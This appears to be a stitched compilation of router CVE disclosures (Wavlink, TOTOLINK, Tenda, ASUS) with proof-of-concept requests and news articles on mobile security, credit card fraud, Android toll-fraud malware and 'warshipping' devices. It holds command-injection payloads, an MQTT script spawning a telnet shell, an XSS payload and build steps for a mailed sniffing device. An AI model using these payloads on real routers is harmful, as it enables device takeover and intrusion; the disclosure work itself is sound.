Wavlink WL-WN575A3 RPT75A3.V4300.201217 was discovered to contain a command injection vulnerability via the function obtw. This vulnerability allows attackers to execute arbitrary commands via a crafted POST request.

**Information**

**Vendor of the products:**    WAVLINK

**Vendor's website:**    https://www.wavlink.com/en\_us

**Reported by:**    WangJincheng(wjcwinmt@outlook.com) & ShaLetian(ltsha@njupt.edu.cn)

**Affected products:** Wavlink WL-WN575A3

**Affected firmware version:** RPT75A3.V4300.201217

**Firmware download address:** https://www.wavlink.com/en\_us/firmware/details/fac744bd61.html

**Overview**

Wavlink WL-WN575A3 RPT75A3.V4300.201217 has several command injection vulnerabilities detected at function obtw. Attackers can send POST request messages to /cgi-bin/wireless.cgi and inject evil commands into parameter CCK_1M or CCK_5M or OFDM_6M or OFDM_12M or HT20_MCS_0 or HT20_MCS_1_2 or HT40_MCS_0 or HT40_MCS_32 or HT40_MCS_1_2 to execute arbitrary commands.

**Show the product**

Wavlink WL-WN575A3 is a AC1200 Dual-band Wi-Fi Range Extender. The test version here is RPT75A3.V4300.201217.

**Vulnerability details**

The vulnerability is detected at /etc_ro/lighttpd/www/cgi-bin/wireless.cgi.

At first, from the _start entry enters, and then the ftext function is executed.

In the function ftext, we find that when bypassing the check of wlan_conf and the content of page field is obtw, we can execute the obtw function.

In the function obtw, the program uses function web_get to obtain the content of parameter obtw_enable , CCK_1M , CCK_5M , OFDM_6M , OFDM_12M , HT20_MCS_0 , HT20_MCS_1_2 , HT40_MCS_0 , HT40_MCS_32 and HT40_MCS_1_2 which are sent by POST request. Then, when obtw_enable != 0, the content of other parameters are formatted into a string passed as an argument to the function do_system which can execute system commands.

Above all, attackers can send POST request messages to /cgi-bin/wireless.cgi and let wlan_conf=2860 & page=obtw and inject evil commands into parameter CCK_1M or CCK_5M or OFDM_6M or OFDM_12M or HT20_MCS_0 or HT20_MCS_1_2 or HT40_MCS_0 or HT40_MCS_32 or HT40_MCS_1_2 to execute arbitrary commands.

**POC**

Send the following to the URL http://wifi.wavlink.com/cgi-bin/wireless.cgi by POST request.

    wlan_conf=2860
    &page=obtw
    &obtw_enable=1
    &CCK_1M=;echo 1 >> /etc_ro/lighttpd/www/data.html;
    &CCK_5M=;echo 2 >> /etc_ro/lighttpd/www/data.html;
    &OFDM_6M=;echo 3 >> /etc_ro/lighttpd/www/data.html;
    &OFDM_12M=;echo 4 >> /etc_ro/lighttpd/www/data.html;
    &HT20_MCS_0=;echo 5 >> /etc_ro/lighttpd/www/data.html;
    &HT20_MCS_1_2=;echo 6 >> /etc_ro/lighttpd/www/data.html;
    &HT40_MCS_0=;echo 7 >> /etc_ro/lighttpd/www/data.html;
    &HT40_MCS_32=;echo 8 >> /etc_ro/lighttpd/www/data.html;
    &HT40_MCS_1_2=;echo 9 >> /etc_ro/lighttpd/www/data.html;
    

**Review Vulnerabilities**

At first, we confirm that the page /data.html does not exist.

Then, we use HackBar to send the POC above. **We inject commands that output 1 to 9 in turn into each parameter.**

Finally, we detect that the page /data.html has been created and the number 1 to 9 are displayed on the page.

So far, we have verified that **the all above nine parameters can be vulnerability points injected by arbitrary commands**.

CVE-2022-34592: CVE/README.md at main · winmt/CVE

TOTOLINK EX300_V2 V4.0.3c.7484 was discovered to contain a command injection vulnerability via the langType parameter in the setLanguageCfg function. This vulnerability is exploitable via a crafted MQTT data packet.

**Information**

**Vendor of the products:**    TOTOLINK

**Vendor's website:**    http://www.totolink.cn

**Reported by:**    WangJincheng(wjcwinmt@outlook.com) & ShaLetian(ltsha@njupt.edu.cn)

**Affected products:**    TOTOLINK EX300\_V2

**Affected firmware version:** V4.0.3c.7484

**Firmware download address:** http://www.totolink.cn/data/upload/20210720/b351052836a4fc7e1575dc513afc02b1.zip

**Overview**

TOTOLINK EX300_V2 V4.0.3c.7484 has a command injection vulnerability detected at function setLanguageCfg. Attackers can send a MQTT data packet and inject evil commands into parameter langType to execute arbitrary commands.

**Show the product**

TOTOLINK EX300_V2 is a Wi-Fi repeater made in China.

**Vulnerability details**

The vulnerability is detected at /bin/cste_modules/global.so.

In the function setLanguageCfg, the content obtained by program through parameter langType given by MQTT data packet is passed to variable Var. Then, the variable Var is formatted into v9 through the function sprintf without any check. Finally, v9 is passed as an argument to the function CsteSystem which can execute system commands.

Above all, attackers can send a MQTT data packet and inject evil commands into parameter langType to execute arbitrary commands.

**POC**

import paho.mqtt.client as mqtt

client \= mqtt.Client()
client.connect("192.168.0.254", 1883, 60)
client.publish("totolink/router/setLanguageCfg", '{"langType": "$(telnetd -l /bin/sh)"}')

**Get shell**

At first, we run the above script to exploit the vulnerability.

Then, we scan ports and dectect that the port 23 which represents Telnet service has been opened.

Finally, we telnet into the Wi-Fi repeater through port 23 and control it successfully.

CVE-2022-32449: CVE/README.md at main · winmt/CVE

By Deeba Ahmed
Israeli Mobile Cybersecurity Startup Cirotta has launched smartphone cases that the company claims to provide complete protection while…
This is a post from HackRead.com Read the original post: Mobile Cybersecurity Firm Cirotta Launches Anti-Hacking Phone Cases

****Israeli Mobile Cybersecurity** **Startup Cirotta has launched smartphone cases that the company claims to provide complete protection while allowing full operation of devices.****

Tel Aviv, Israel-based startup Cirotta has introduced a ground-breaking method to prevent mobile phone hacking and data privacy breaches. The company explained in a press release that it has successfully converted smartphone cases into full-fledged electronic security devices.

**A Novel Idea**

Undoubtedly, turning phone cases into electronic security gadgets is a unique idea to create a security barrier between threat actors and smartphone data. According to Cirotta, these phone cases offer foolproof security to the phone without impacting the device’s normal operations.

**Target Consumers**

The case price starts at $200, which is quite expensive for a phone case. However, it is worth investing in protecting your data. The cases’ target audiences currently include security, government, and military institutions/officials, high-profile executives, and VIPs.

For your information, Cirotta specializes in creating advanced anti-surveillance technologies for smartphones.

**Anti-Hacking Phone Case Detailed Overview**

According to Cirotta, these anti-hacking phone cases are backed up by six patents. These are available in numerous configurations to meet the diverse needs of smartphone users.

Moreover, these cases are non-device or network-specific and function independently. Another great feature is that the cases are well-designed and aesthetically pleasing. Regarding their capabilities, Cirotta explained that the case blocks camera lenses to prevent threat actors from accessing cameras and spying on the user.

Furthermore, these prevent undesired conversation tracking/recording, thwart operating system hacking or data sweeping when the phone is turned on, and use highly advanced security algorithms to evade the phone’s active noise filtering mechanism.

The cases can also prevent hackers from abusing microphones remotely and block location tracking by overriding the GPS data. That’s not all; the anti-hacking cases can nullify monitoring of Wi-Fi and Bluetooth connections and offset Near-field communication (NFC).

**Two Models Available in Anti-Hacking Cases**

The cases are available in two models- Athena and Universal. Athena is compatible with a broad range of high-end smartphone models, including the iPhone 12 Pro, iPhone 13 Pro, Samsung Galaxy S22, and upcoming models in these series.

Currently, Athena Silver is available that can block the device’s camera and mic. Athena Gold will be launched soon with the capability of securing the device’s Wi-Fi, GPS, and Bluetooth connectivity, among other features.

Conversely, the Universal model is compatible with almost all smartphone models. You can choose between Universal Gold, Silver, and Bronze model. Bronze can only block the phone’s camera, Silver can block the camera and mic, and Gold can block all transmissible data points such as camera, mic, GPS, Wi-Fi, and Bluetooth. This model will be available from August 2022.

**More Anti-Surveillance & Anti-Hacking Tools**

*   Anti-surveillance mask enables you to pass as someone else
*   Meet IRpair & Phantom; powerful anti-facial recognition glasses
*   These Anti-Surveillance Tools Will Protect Activists and Their Privacy
*   New anti-facial recognition glasses protect users’ privacy from CCTV
*   SnoopSnitch — An App That Detects Govt’s Stingray Mobile Trackers

Mobile Cybersecurity Firm Cirotta Launches Anti-Hacking Phone Cases

Here's how I did it and how you can protect your company against such physical/digital hybrid attacks.

Most companies have strategies in place to educate employees about network security. But there has been a lot less awareness and education on how to reduce "phygital" risks — that is, physical devices that launch digital attacks against a company's computer networks.

Another name for these phygital attacks is "warshipping." Essentially, a malicious hacker creates an Internet-enabled device — for example, a miniature computer — and sends it through physical mail in an attempt to compromise a company's computer network. What's more, because so many employees have yet to return to their physical offices post-lockdown, these devices can easily sit for months unattended in unopened mail on desks and in mailrooms, gathering data and exploiting vulnerabilities in a company's network.

It's frighteningly easy and inexpensive to make your own DIY version of a warshipping device. With just three hours, a couple of hundred dollars, and a few YouTube videos, nearly anyone can do it. To show you exactly how easy it is, I'm going to talk about how I built a warshipping device and then discuss what you can do to protect your company against these attacks.

**Building a Warshipping Device**

Prepare yourselves for a bit of a technical jump into hardware and software. We don't have the space here to go into every aspect of building a warshipping device, but the following should give you a harrowing sense of exactly how easy and inexpensive the process can be.

**Building hardware.** The foundation of any warshipping device is as simple as a hobbyist circuit board not much bigger than a credit card, which can operate like a miniature computer. One example is a Raspberry Pi, which is easily found online and arrives with the required software, or at least software that can also be easily found online.

Next you need a Wi-Fi dongle of some kind so your warshipping device can connect to the Internet wirelessly. A USB Wi-Fi adapter and a memory card with at least 32 GBs of storage, along with a SIM card to enable a cellular connection and optional GPS device, will complete the hardware requirements.

**Software prerequisites.** Raspberry Pis have their own Ubuntu-based operating system (OS) called Raspberry Pi OS.

Next you'll need to establish remote access. You need to find your device's IP address so you can connect to it through your computer or another device. To do that, you can run a scan on your local network or use a smartphone app. Next enter the default password for a Raspberry Pi, which is "raspberry." You now have a functional warshipping device.

**Ready for warshipping.** At last you can install your software for warshipping. Your actual warshipping software comes in two parts: your optional GPS software if you want to keep track of your device location and Kismet or a similar network-detecting software.

Kismet acts as a packet sniffer, which finds and captures packets of data from a network to store or forward that information. So Kismet can potentially be used to grab data from your network.

Your device is now ready to cause a world of pain for some poor IT team. All you have to do is send it in the mail, and when it arrives you can access sensitive data or find a vulnerable access point for an attack via the cellular connection. Then you could join the realm of malicious hackers who are costing companies worldwide $2.9 million every minute due to cybercrime.

**Key Takeaways**

So what are some useful takeaways from all of this?

First, you need to realize that this threat isn't going away. These attacks are simply too easy to launch and too hard to address. After all, who has the time to sort through all of that incoming mail as soon as it arrives?

Second, you need to develop phygital security measures as part of your overall cybersecurity efforts. Packages can sit in mailrooms for weeks — or these days, months — before someone processes them. Any of those packages could contain a warshipping device that can use their idle time gathering data from your network. Because warshipping devices can be small enough to fit between two pieces of cardboard, even an opened empty box you're saving in the mailroom to be reused at a later date could be a threat. 

To address the issue, you can start by immediately processing packages that are incorrectly addressed, since these will get returned to the sender. But you should go beyond that to process all unopened mail as quickly as possible and never retain used packaging materials in the mailroom. You can also look into the latest mail-scanning technology, which can detect these devices while avoiding the harmful effects of X-rays.

Third, network discovery software can help you pick up on unusual traffic and detect any new devices the minute they connect to your network. That means you can potentially detect a warshipping device before any damage is done. In addition, the wave of layoffs in the recent Great Resignation, insider threats from individuals who are or formerly were authorized users in your network are just as common and may be harder to detect, since these people may have access to approved credentials and devices.

Fourth, educate your employees. They likely have no idea that packages they left on their desks for a few days while they were working remotely could have a warshipping device inside, so do them and yourselves a favor by alerting them to the possible threat.

If there's one thing you've learned from this article, it should be that the phygital world is a dangerous place. But just knowing about the danger is half the battle. So now you know.

I Built a Cheap 'Warshipping' Device in Just 3 Hours — and So Can You

Tenda AX1806 v1.0.0.1 was discovered to contain a command injection vulnerability via the function WanParameterSetting.

**\*\*\* Command Injection Vulnerability in Tenda AX1806 \*\*****_**\*Overview\***_**

*   _**\*Type\***_: Command Injection Vulnerability
    
*   _**\*Supplier\***_: Tenda ( https://tenda.com.cn )
    
*   \*\*\*Product\*\*: WiFi router AX1806
    
*   Firmware download address: \*\*\*\* https://www.tenda.com.cn/download/detail-3306.html
    
*   Firmware download address: \*\*\*\* https://down.tenda.com.cn/uploadfile/AX1806/US\_AX1806V21brv1001cn2988ZGDX01.zip
    

Tenda AX1806 uses a new generation of WIFI6 (802.11ax) technology, and combines higher number of subcarriers and 1024QAM modulation technology. Compared with wifi-5 routers, dual-band wireless internet access rate is greatly improved. WanParameterSetting has a Command Execution Vulnerability

**_**\*Description\***_****\*_**1, Product Information:\***_**

Overview of the latest version of Tenda AX1806 router simulation:

\### \*_**2\. Vulnerability Details\***_

Tenda AX1806 was found to have a command injection vulnerability in the WanParameterSetting function

The non-zero is true, and when we change the adslPwd parameter, we get a command injection vulnerability after setting it.

**_**\*3. Recurring loopholes and POC\***_**

To reproduce the vulnerability, the following steps can be followed:

Start firmware (real machine) via qemu-system or other means

Attack using the following POC attacks

Note the replacement of password fields in cookies

    POST /goform/WanParameterSetting?0.8762489734485668 HTTP/1.1
    Host: i92.168.68.150
    Connection: close
    Content-Length: 191
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
    Accept: */*
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36
    sec-ch-ua-platform: "macOS"
    Origin: https://i92.168.68.150
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://192.168.2.1/main.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=edeff4d6d98974e46457a587e2e724a2ndy5gk
    
    wanType=2&adslUser=aaaa&adslPwd=$(ls > /tmp/xxx)&vpnServer=&vpnUser=&vpnPwd=&vpnWanType=l&dnsAuto=1&staticIp=&mask=&gateway=&dnsl=&dns2=&module=wanl&downSpeedLimit=

CVE-2022-34597: IOT_Vul/readme_en.md at main · zhefox/IOT_Vul

Tenda AX1803 v1.0.0.1_2890 was discovered to contain a command injection vulnerability via the function WanParameterSetting.

#_**\* Tenda ax1803 has a command injection vulnerability\***_

##\* \* \* \\ \* overview\*\*\*\*

• \*\*\*\*\* type \\ \*\*\*\*: command injection vulnerability

• \* \* \* \\ \* supplier \\ \* \* \* \*: Tenda（ https://tenda.com.cn ）

• \*\*\*\*\* product \*\*\*\*: WiFi router ax1803

• _**\* firmware download address:\***_ https://www.tenda.com.cn/download/detail-3225.html

• _**\* firmware download address:\***_ https://down.tenda.com.cn/uploadfile/AX1803/US\_AX1803v2.1br\_v1.0.0.1\_2890\_CN\_ZGYD01.zip

Tendaax1803 router adopts WiFi 6 (802.11ax) technology, and the dual band concurrency rate is up to 1775mbps (2.4ghz:574mbps, 5ghz:1201mbps). Compared with the ac1200 router of the previous generation WiFi 5 standard, the wireless rate is increased by 50% and the transmission distance is longer; Equipped with 1.5GHz high-performance quad core processor, the network load capacity is comprehensively improved, data forwarding is faster, and long-term operation is more stable; Using ofdma+mu-mimo technology, more devices can access the Internet at the same time, the transmission efficiency is significantly improved, the delay is significantly reduced, and the online games and ultra clear videos for multiple people are more fluent. It is the first choice for building a multimedia home network! Command Execution Vulnerability in wanparametersetting

**_**\*Description\***_****\*_**1, Product Information:\***_**

Overview of the latest version of simulation for Tenda AX1803 router:

**\*_**2\. Vulnerability Details\***_**

Tenda AX1803 was found to have a command injection vulnerability in the WanParameterSetting function

The non-zero is true, and when we change the adslPwd parameter, we get a command injection vulnerability after setting it.

\## _**\*3. Recurring loopholes and POC\***_

To reproduce the vulnerability, the following steps can be followed:

Start firmware (real machine) via qemu-system or other means

Attack using the following POC attacks

Note the replacement of password fields in cookies

    POST /goform/WanParameterSetting?0.8762489734485668 HTTP/1.1
    Host: i92.168.68.150
    Connection: close
    Content-Length: 191
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
    Accept: */*
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36
    sec-ch-ua-platform: "macOS"
    Origin: https://i92.168.68.150
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://192.168.2.1/main.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=edeff4d6d98974e46457a587e2e724a2ndy5gk
    
    wanType=2&adslUser=aaaa&adslPwd=$(ls > /tmp/xxx)&vpnServer=&vpnUser=&vpnPwd=&vpnWanType=l&dnsAuto=1&staticIp=&mask=&gateway=&dnsl=&dns2=&module=wanl&downSpeedLimit=

CVE-2022-34596: IOT_Vul/readme_en.md at main · zhefox/IOT_Vul

Tenda AX1803 v1.0.0.1_2890 was discovered to contain a command injection vulnerability via the function setipv6status.

#_**\* Tenda ax1803 has a command injection vulnerability\***_

##\* \* \* \\ \* overview\*\*\*\*

• \*\*\*\*\* type \\ \*\*\*\*: command injection vulnerability

• \* \* \* \\ \* supplier \\ \* \* \* \*: Tengda（ https://tenda.com.cn ）

• \*\*\*\*\* product \*\*\*\*: WiFi router ax1803

• _**\*Firmware download address：\***_ https://www.tenda.com.cn/download/detail-3225.html

• \*\*\*\*Firmware download address：\*\*\*\*https://down.tenda.com.cn/uploadfile/AX1803/US\_AX1803v2.1br\_v1.0.0.1\_2890\_CN\_ZGYD01.zip

Tendaax1803 router adopts WiFi 6 (802.11ax) technology, and the dual band concurrency rate is up to 1775mbps (2.4ghz:574mbps, 5ghz:1201mbps). Compared with the ac1200 router of the previous generation WiFi 5 standard, the wireless rate is increased by 50% and the transmission distance is longer; Equipped with 1.5GHz high-performance quad core processor, the network load capacity is comprehensively improved, data forwarding is faster, and long-term operation is more stable; Using ofdma+mu-mimo technology, more devices can access the Internet at the same time, the transmission efficiency is significantly improved, the delay is significantly reduced, and the online games and ultra clear videos for multiple people are more fluent. It is the first choice for building a multimedia home network! Command Execution Vulnerability in setipv6status

##\* \* \* \\ \* description\*\*\*\*

###_**\* I. product information:\***_

Overview of the latest version of Tenda ax1803 router simulation:

\### _**\*2. Vulnerability details\***_

Tenda ax1803 is found to have a command injection vulnerability in the setipv6status function

When we set connect type = ' PPPoE ', we will get a command injection vulnerability after logging in.

\## _**\*3. Recurring vulnerabilities and POCS\***_

To reproduce the vulnerability, the following steps can be followed:

Start firmware through QEMU system or other methods (real machine)

Attack with the following POC attacks

Note to replace the password field in the cookie

    POST /goform/setIPv6Status HTTP/1.1
    Host: 192.168.2.1
    Connection: close
    Content-Length: 191
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
    Accept: */*
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36
    sec-ch-ua-platform: "macOS"
    Origin: https://192.168.2.1
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://192.168.2.1/main.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=edeff4d6d98974e46457a587e2e724a2ndy5gk
    
    IPv6En=1&conType=PPPoE&ISPusername=addasdas&ISPpassword=$(ls > /tmp/xxx)&prefixDelegate=0&wanAddr=%2F&gateWay=&lanType=undefined&wanPreDNS=&wanAltDNS=&lanPrefix=undefined%2F64

CVE-2022-34595: IOT_Vul/readme_en.md at main · zhefox/IOT_Vul

By Owais Sultan
Credit card fraud happens when someone steals your credit information and uses it to make purchases or borrow…
This is a post from HackRead.com Read the original post: Protection Against Online Scams: How to Keep Your Credit Safe

Credit card fraud happens when someone steals your credit information and uses it to make purchases or borrow money. While victims of fraud don’t typically have to pay anything, the situation can take time and effort to sort out.

Reporting stolen cards and waiting around for your new one to be delivered in the mail can feel like a hassle. However, you can take steps to protect your card from everyday threats. Keep reading to learn six ways to keep your credit card safe.

**1\. Use Two-Factor Authentication**

Whether you use a credit builder card or a traditional credit card, your card’s mobile app likely has two-factor authentication. This second layer of safety provides added protection. Typical passwords can be easy to guess and shouldn’t be your only form of security. Enabling two-factor authentication makes it harder for people with ill intentions to access your information.

Once you have two-factor authentication turned on, the mobile app will require two types of information to access your account. One of these will be your password. The other will be a code sent to your phone or biometric data like face recognition or a fingerprint. So, even if your password is leaked, no one can access your information without a second form of verification.

**2\. Shop on Your Device with a Private Network**

The library isn’t the best place to do your online shopping. Public devices, like library computers or hotel lobby tablets, save your login information, making it available to the next user. Logging out of your accounts won’t protect you either. If hackers have installed spyware on the device, they can access your credit card numbers, usernames, and passwords.

While using a personal device offers some protection, cybercriminals can still access your information if you’re using public Wi-Fi. Public Wi-Fi networks may be convenient, but they’re insecure, so it’s best to treat them with caution. If you can, use your personal hotspot instead.

**3\. Use Unique Passwords**

If you’re like most people, you use the same password across multiple accounts. With so many digital accounts to manage, using the same password may help you remember your login information.

However, it also makes your credit card account easier to hack. When you use the same password all the time, you increase your risk of credential stuffing. This happens when criminals use information stolen from one account to try and gain access to the rest of your accounts.

To protect your credit card information from credential stuffing, your online banking passwords should be unique. A good rule of thumb when creating passwords is to combine upper and lowercase letters with numbers and symbols.

Moreover, start using a password manager to help you manage different, complex passwords across multiple accounts. Password managers safely store all your online passwords, so you don’t have to remember them.

**4\. Watch Out for Phishing**

If you get a call or receive an email requesting your credit card information, do not respond. It’s likely a scammer trying to trick you with a phishing scheme. Phishing is when someone calls or emails you requesting your personal information. These scammers can be tricky and use familiar company names to make it appear as if they’re someone they’re not.

To help protect yourself from phishing, maintain a healthy level of suspicion when you receive requests for personal information. Your bank will never call you to verify account information, so don’t provide credit card information on a call you didn’t initiate. If you receive an email from an address you don’t recognize, don’t click any links and report it immediately.

**5\. Look for Card Skimming**

Skimming is a method of theft criminals use to steal your credit card information at the time of use. This is commonly done through a device attached to a point-of-purchase machine like an ATM or gas pump. These little devices are typically placed over the card reader and are challenging to spot.

While it may be difficult to see a skimming device, there are a couple of things you can do to protect yourself. First, examine any card reading machine before using it. If the graphics look misaligned on the reader or if it seems loose or crooked, it may have been tampered with. Another way to avoid skimming is simply to pay inside when purchasing gas. This completely eliminates the chances of getting skimmed.

**6\. Act Quickly**

If your wallet is stolen or your credit card goes missing, acting quickly can help minimize the damage. First thing’s first, you need to report the theft to your card issuer. Then, they will cancel your old card and send you a replacement in the mail.

If there were any fraudulent charges made on your account, you should receive a refund. The Fair Credit Billing Act protects people from credit card fraud, setting your maximum liability at $50. After receiving your credit card statement, confirm that the information is accurate.

Credit card fraud is frustrating to deal with, but it doesn’t have to happen. By taking the proper steps to protect yourself, you can significantly reduce your chances of becoming a victim.

**More Card Security News**

*   New credit card skimmers channel funds through Telegram
*   Over 500 Magento sites hacked in payment skimmer attack
*   Largest dark web market for stolen cards UniCC calls it quits
*   Bluetana app detects gas pumps card skimmers in 3 seconds
*   Cloud video platform abused in skimmer attack against real estate sites

Owais takes care of Hackread's social media from the very first day. At the same time He is pursuing for chartered accountancy and doing part time freelance writing.

Protection Against Online Scams: How to Keep Your Credit Safe

By Deeba Ahmed
Those still using older versions of the Android operating system are at risk. Microsoft’s 365 Defender team has detected a…
This is a post from HackRead.com Read the original post: Microsoft Warns of Evolving Toll Fraud Android Malware Draining Wallets

****Those still using older versions of the Android operating system are at risk.****

Microsoft’s 365 Defender team has detected a new and evolving Android malware that targets users’ crypto wallets to steal funds without raising suspicion. According to researchers; the malware hunts for devices still using older versions of Android OS.

Toll fraud falls into a billing fraud subcategory that automatically signs the user for a premium service without asking for user content. Since it is continuously evolving, researchers regard it as dangerous Android malware.

**A Novel Fraud**

The malware has a unique attack approach compared to other billing frauds such as call or SMS fraud. Where other types of scams utilize standard attack flow involving making calls or sending messages to premium numbers, toll fraud uses a complicated multi-step attack flow, which the malware developers are continually improving.

Furthermore, Microsoft explained that the malware targets “specific network operators” and performs its routines only if the device is subscribed to one of its approved network operators. And it uses cellular data for its malicious operations by default. In fact, it forces devices to connect to a mobile network even when a Wi-Fi connection is available.

**Attack Scenario**

According to the findings shared by Microsoft’s researchers, the evolving toll fraud scheme exploits the Wireless Application Protocol (WAP) billing mechanism to target Android users. For your information, applications use WAP to charge users for paid content via their mobile phone bills. But, the malware can easily enroll the user in premium services since it utilizes cellular networks to function.

The attack chain commences when the user disconnects from a Wi-Fi network and connects to a mobile network. The Android malware quickly launched the subscription page and automatically subscribed the user to the service.

Once this is done, the malware reads a one-time password (OTP), if any, and fills the required fields to finish the subscription process. The attackers then disguise this activity by disabling SMS notifications.

**Possible Dangers**

According to Microsoft’s blog post, Toll fraud poses numerous risks, including the unwanted increase in your monthly phone bill. Since the malware hides behind legitimate apps requiring a wide range of permissions, it becomes impossible to detect it. It hides behind apps requesting SMS permissions, personalization, editing access, and communication-related privileges. Such as wallpaper or lock screen apps, chat/messaging apps, fake antivirus, and cleaner and camera apps.

It must be noted that the malware targets phones running Android 9 or older versions. This means mobile phones using Android version 10 or higher are safe. Still, it is recommended to install antivirus apps for added protection and avoid installing apps from 3rd-party sources.

**More Android Malware News**

*   Play Store Apps Caught Spreading Android Malware to Millions
*   Watch out as new Android malware spreads through WhatsApp
*   Microsoft warns of new Android ransomware blackmailing victims
*   Web3 Backdoor Wallets Steals Seed Phrases from iOS/Android Phones
*   New Russian Android Malware Tracks GPS Location and Spies on Victims

Microsoft Warns of Evolving Toll Fraud Android Malware Draining Wallets

ASUS RT-A88U 3.0.0.4.386_45898 is vulnerable to Cross Site Scripting (XSS). The ASUS router admin panel does not sanitize the WiFI logs correctly, if an attacker was able to change the SSID of the router with a custom payload, they could achieve stored XSS on the device.

While studying for my master's degree in cyber security, I co-authored a paper regarding the rollout of IoT devices and the security considerations that businesses need to address to ensure these devices are secure. The paper underscored how a large majority of IoT devices used vulnerable components and did not follow basic secure programming principles.

As I was setting up my own new internal network in September 2021, I stumbled upon various logging functionalities within the custom deployment of DD-WRT that raised questions in my mind. DD-WRT, or in this case ASUSWRT, is a custom-developed Linux-based operating system for consumer router/modem products. Developed internally by ASUSTek, ASUSWRT builds on the standard DD-WRT distribution with a custom web interface and additional features, such as ASUSTek AiMesh networking products. The web front-end is programmed in ASP, which acts as a user interface for controlling various settings within the NVRAM of the device.

I had previously looked at router firmware but never found any vulnerabilities as such. Intrigued by the potential security-related issues that could occur if my router was hijacked, I set one of my Wi-Fi radios to a basic XSS payload to see if it had been sanitized...

“><script>alert(1)</script>

Nope, no popup...

I moved on, considering that there would be no way an XSS would be present within a software package that is so widely deployed across the world, until...

A few days later, my ISP was playing up, so I logged in to the router and navigated to the log section of the platform to see if there were any issues on my side with the router. I quickly clicked through the menus provided, one being “Wireless logs.” I suddenly had a JavaScript popup in my browser window: My original XSS had fired under the log page.

Win!

**Why Does This Matter?**

ASUS routers have a functionality named **Remote Management** that allows for users to connect back to their home routers over HTTP, over port 8443. This also allows users to attach devices, such as USB pen drives, to their router to effectively turn it into a router/network attached storage combo unit.

An attacker with pre-existing access to a router could use this vulnerability to maintain persistence to the router, even after a password reset/IP address change. An attacker could additionally leverage this exploit to change any setting on the router, including Wi-Fi passwords and DNS servers, and enabling telnet/SSH. **Ultimately, this exploit allows for complete takeover of a compromised router when chained with basic Unix knowledge**.

It would be trivial to create a Shodan search query to pull in all ASUS router products accessible from the internet (Figure 1) (Table 1). Although the user must set their own password from the default one provided by the manufacturer to first access the web admin interface, cybercriminals know all too well that users commonly reuse passwords.

Figure 1 – Exposed ASUS Routers Globally

Vulnerable Firmware/Device – 3.0.0.4.386.46061

All Zen WiFi lineup

RT-AC66U B1 

All 802.11axl lineup

RT-AC66U+

All ROG Rapture lineup

RT-AC1300UHP/ G+

All TUF Gaming lineup

RT-AC1200

RT-AC5300

RT-AC1200G/HP/G+/ E/ GU

RT-AC3100

RT-AC58U

RT-AC88U

RT-AC56U/R/S

RT-AC3200

RT-AC55U

RT-AC2900

RT-AC55UHP

RT-AC2600

RT-AC53

RT-AC2400

RT-AC52U B1

RT-AC2200

RT-AC51U/ U+

RT-AC87U/R

RT-ACRH17

RT-AC86U

RT-ACRH13

RT-AC85U

RT-N66U/R/W/C1

RT-AC85P

RT-N18U

RT-AC65P

RT-N19

RT-AC57U

RT-N14UHP

RT-AC68U/R/P/W/UF

RT-N12E B1/C1

RT-AC65U

RT-N12HP B1

RT-AC1900

RT-N12VP B1

RT-AC1900P/U

RT-N12+ B1

RT-AC1750

RT-N12D1

RT-AC1750 B1 

4G-AC53U

RT-AC66U/R/W

4G-AC68U

Table 1 – Vulnerable Firmware to Devices

**Code Analysis**

I subsequently dumped the firmware from a vulnerable version, accessed via the ASUSTek update page.

Upon downloading the file, you will be presented with a **.trx** file, which is effectively a zip containing the mount points for the operating system. The web front-end is stored within the **/www** folder, and in this case, the vulnerable code is located within the **Main\_WStatus\_Content.asp** file.

This file preforms a GET request to **/wl\_log.asp** upon accessing the page. Within this request, the SSID of the router will also be returned, among data such as MAC addresses, access time for clients, and some other general debug information. The page then uses the following code to convert elements within the log, back to readable format, HTML encoding them in the process:

Function(resp){  
Content = htmlEnDeCode.htmlEncode(resp);  
Content = classObj.UnHexCode(content);  
\--- Snip ---

While this page attempts to decode the information provided by the GET request, in doing so, there is no filtering for malicious content, such as HTML tags. The script then continues and places the data within a <textarea> HTML element; in this case, the XSS payload is processed by the browser and the vulnerability has been exploited. The user’s browser will execute the payload and the attacker has control over the device.

**Vulnerability Submission and Patch Released**

I subsequently contacted ASUSTek on October 28, 2021, at 3:40 p.m. (UTC). The ASUS Security department (“ASUS security”) first requested that I update my firmware version to 386\_45898 to verify that the vulnerability existed on the latest release of the firmware. After updating the software, I confirmed that the firmware was still vulnerable to the exploit.

ASUS security then requested a proof-of-concept script/video of the attack for their internal reference. After I provided a short 20-second clip of the vulnerability in action, ASUS security immediately accepted the submission.

